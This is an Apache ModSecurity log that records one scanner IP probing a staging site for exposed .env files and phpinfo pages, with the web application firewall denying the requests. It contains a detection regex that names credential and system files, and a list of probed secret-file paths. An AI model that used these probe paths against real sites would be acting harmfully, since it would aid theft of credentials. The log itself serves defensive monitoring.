[Tue May 26 15:30:52.696496 2026] [security2:error] [pid 715645:tid 715673] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/media/.env"] [unique_id "ahVvVHVGgMGh8k213RgOrQAAURs"]
[Tue May 26 15:30:52.708394 2026] [security2:error] [pid 715645:tid 715790] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOogAAAA8"]
[Tue May 26 15:30:52.718565 2026] [security2:error] [pid 715645:tid 715839] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOpgAAAEA"]
[Tue May 26 15:30:52.731008 2026] [security2:error] [pid 715645:tid 715789] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOqAAAAA4"]
[Tue May 26 15:30:52.739480 2026] [security2:error] [pid 715645:tid 715897] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOqQAAAHo"]
[Tue May 26 15:30:52.758437 2026] [security2:error] [pid 715645:tid 715798] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOswAAABc"]
[Tue May 26 15:30:52.766601 2026] [security2:error] [pid 715645:tid 715823] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOtgAAADA"]
[Tue May 26 15:30:52.772144 2026] [security2:error] [pid 715645:tid 715837] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOtwAAAD4"]
[Tue May 26 15:30:52.773851 2026] [security2:error] [pid 715645:tid 715858] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOuAAAAFM"]
[Tue May 26 15:30:52.784435 2026] [security2:error] [pid 715645:tid 715735] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/new/.env"] [unique_id "ahVvVHVGgMGh8k213RgOuQAAE1k"]
[Tue May 26 15:30:52.799081 2026] [security2:error] [pid 715645:tid 715646] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/node-api/.env"] [unique_id "ahVvVHVGgMGh8k213RgOugAAFQA"]
[Tue May 26 15:30:52.808914 2026] [security2:error] [pid 715645:tid 715762] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/node/.env"] [unique_id "ahVvVHVGgMGh8k213RgOuwAAGXQ"]
[Tue May 26 15:30:52.811722 2026] [security2:error] [pid 715645:tid 715720] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/node/backend/.env"] [unique_id "ahVvVHVGgMGh8k213RgOvQAAP0o"]
[Tue May 26 15:30:52.811999 2026] [security2:error] [pid 715645:tid 715713] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/node/api/.env"] [unique_id "ahVvVHVGgMGh8k213RgOvAAAP0M"]
[Tue May 26 15:30:52.831788 2026] [security2:error] [pid 715645:tid 715714] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/nodeapi/.env"] [unique_id "ahVvVHVGgMGh8k213RgOvgAAIkQ"]
[Tue May 26 15:30:52.837371 2026] [security2:error] [pid 715645:tid 715721] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/nodeweb/.env"] [unique_id "ahVvVHVGgMGh8k213RgOvwAAfUs"]
[Tue May 26 15:30:52.878983 2026] [security2:error] [pid 715645:tid 715647] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/old/.env"] [unique_id "ahVvVHVGgMGh8k213RgOxwAAMgE"]
[Tue May 26 15:30:52.896940 2026] [security2:error] [pid 715645:tid 715859] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOwgAAAFQ"]
[Tue May 26 15:30:52.905740 2026] [security2:error] [pid 715645:tid 715744] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/opt/.env"] [unique_id "ahVvVHVGgMGh8k213RgO0AAAMmI"]
[Tue May 26 15:30:52.918221 2026] [security2:error] [pid 715645:tid 715811] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOxgAAACQ"]
[Tue May 26 15:30:52.926851 2026] [security2:error] [pid 715645:tid 715876] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOyQAAAGU"]
[Tue May 26 15:30:52.946266 2026] [security2:error] [pid 715645:tid 715871] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgOzgAAAGA"]
[Tue May 26 15:30:52.978458 2026] [security2:error] [pid 715645:tid 715893] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgO2QAAAHY"]
[Tue May 26 15:30:52.978869 2026] [security2:error] [pid 715645:tid 715873] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgO1QAAAGI"]
[Tue May 26 15:30:52.988752 2026] [security2:error] [pid 715645:tid 715827] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgO2AAAADQ"]
[Tue May 26 15:30:52.996493 2026] [security2:error] [pid 715645:tid 715799] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgO3AAAABg"]
[Tue May 26 15:30:53.010357 2026] [security2:error] [pid 715645:tid 715880] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgO4gAAAGk"]
[Tue May 26 15:30:53.012721 2026] [security2:error] [pid 715645:tid 715855] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgO5wAAAFA"]
[Tue May 26 15:30:53.016232 2026] [security2:error] [pid 715645:tid 715890] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgO6AAAAHM"]
[Tue May 26 15:30:53.021446 2026] [security2:error] [pid 715645:tid 715874] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgO6QAAAGM"]
[Tue May 26 15:30:53.033730 2026] [security2:error] [pid 715645:tid 715854] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgO7wAAAE8"]
[Tue May 26 15:30:53.044185 2026] [security2:error] [pid 715645:tid 715879] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVHVGgMGh8k213RgO8QAAAGg"]
[Tue May 26 15:30:53.084695 2026] [security2:error] [pid 715645:tid 715813] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgO9AAAACY"]
[Tue May 26 15:30:53.095577 2026] [security2:error] [pid 715645:tid 715818] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgO-AAAACs"]
[Tue May 26 15:30:53.108496 2026] [security2:error] [pid 715645:tid 715881] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgO-gAAAGo"]
[Tue May 26 15:30:53.115534 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgO_QAAAAM"]
[Tue May 26 15:30:53.129842 2026] [security2:error] [pid 715645:tid 715832] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPAAAAADk"]
[Tue May 26 15:30:53.135795 2026] [security2:error] [pid 715645:tid 715761] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/php-info.php"] [unique_id "ahVvVXVGgMGh8k213RgPCQAAMnM"]
[Tue May 26 15:30:53.143090 2026] [security2:error] [pid 715645:tid 715738] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/php.php"] [unique_id "ahVvVXVGgMGh8k213RgPDAAAMlw"]
[Tue May 26 15:30:53.156763 2026] [security2:error] [pid 715645:tid 715709] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/php_info.php"] [unique_id "ahVvVXVGgMGh8k213RgPDwAAMj8"]
[Tue May 26 15:30:53.162826 2026] [security2:error] [pid 715645:tid 715728] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/phpinfo.php"] [unique_id "ahVvVXVGgMGh8k213RgPEgAAMlI"]
[Tue May 26 15:30:53.181350 2026] [security2:error] [pid 715645:tid 715672] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/portal/.env"] [unique_id "ahVvVXVGgMGh8k213RgPFwAAMho"]
[Tue May 26 15:30:53.247848 2026] [security2:error] [pid 715645:tid 715652] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/prod/.env"] [unique_id "ahVvVXVGgMGh8k213RgPHwAAMgY"]
[Tue May 26 15:30:53.263605 2026] [security2:error] [pid 715645:tid 715658] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/product/.env"] [unique_id "ahVvVXVGgMGh8k213RgPIQAAMgw"]
[Tue May 26 15:30:53.279155 2026] [security2:error] [pid 715645:tid 715659] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/production/.env"] [unique_id "ahVvVXVGgMGh8k213RgPIgAAMg0"]
[Tue May 26 15:30:53.285287 2026] [security2:error] [pid 715645:tid 715798] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPAwAAABc"]
[Tue May 26 15:30:53.305031 2026] [security2:error] [pid 715645:tid 715771] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/project/.env"] [unique_id "ahVvVXVGgMGh8k213RgPJwAAMn0"]
[Tue May 26 15:30:53.315551 2026] [security2:error] [pid 715645:tid 715825] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPBQAAMmg"]
[Tue May 26 15:30:53.321802 2026] [security2:error] [pid 715645:tid 715825] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPFAAAMlU"]
[Tue May 26 15:30:53.324263 2026] [security2:error] [pid 715645:tid 715800] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPGwAAABk"]
[Tue May 26 15:30:53.326666 2026] [security2:error] [pid 715645:tid 715825] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPIAAAMms"]
[Tue May 26 15:30:53.328636 2026] [security2:error] [pid 715645:tid 715674] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/public-api/.env"] [unique_id "ahVvVXVGgMGh8k213RgPLAAAMhw"]
[Tue May 26 15:30:53.335555 2026] [security2:error] [pid 715645:tid 715792] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPHgAAABE"]
[Tue May 26 15:30:53.336986 2026] [security2:error] [pid 715645:tid 715878] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPEwAAAGc"]
[Tue May 26 15:30:53.348021 2026] [security2:error] [pid 715645:tid 715883] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPCgAAAGw"]
[Tue May 26 15:30:53.355022 2026] [security2:error] [pid 715645:tid 715852] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPKAAAAE0"]
[Tue May 26 15:30:53.355035 2026] [security2:error] [pid 715645:tid 715862] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPKQAAAFc"]
